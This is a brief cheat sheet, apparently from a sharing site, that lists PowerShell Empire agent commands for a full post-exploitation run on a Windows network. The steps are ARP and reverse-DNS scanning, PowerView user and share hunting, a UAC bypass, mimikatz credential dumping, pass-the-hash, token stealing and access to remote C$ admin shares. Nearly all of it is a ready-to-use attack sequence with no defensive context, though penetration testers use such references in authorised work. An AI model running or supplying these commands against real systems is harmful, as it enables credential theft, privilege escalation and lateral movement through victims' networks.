agents
interact AGENTNAME
sysinfo
usemodule situational_awareness/network/arpscan
set Range 10.0.0.0-10.0.0.255
execute
...
usemodule situational_awareness/network/reverse_dns
set Range 10.0.0.0-10.0.0.255
execute
...
usemodule situational_awareness/network/powerview/user_hunter
execute
...
usemodule situational_awareness/network/powerview/share_finder
set CheckShareAccess True
execute
...
agents
interact AGENTNAME
bypassuac LISTENERNAME
y
...wait for agent now active to appear...
agents
(look for a user with * as this indicates admin)
interact AGENTNAME
mimikatz
(collect creds, etc...)
creds
dir \\COMPUTERNAME\C$
creds
pth 1
(passthehash using cred 1, a PID will be created)
steal_token PIDNUM
dir \\COMPUTERNAME\C$
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets
More Cheat Sheets by fred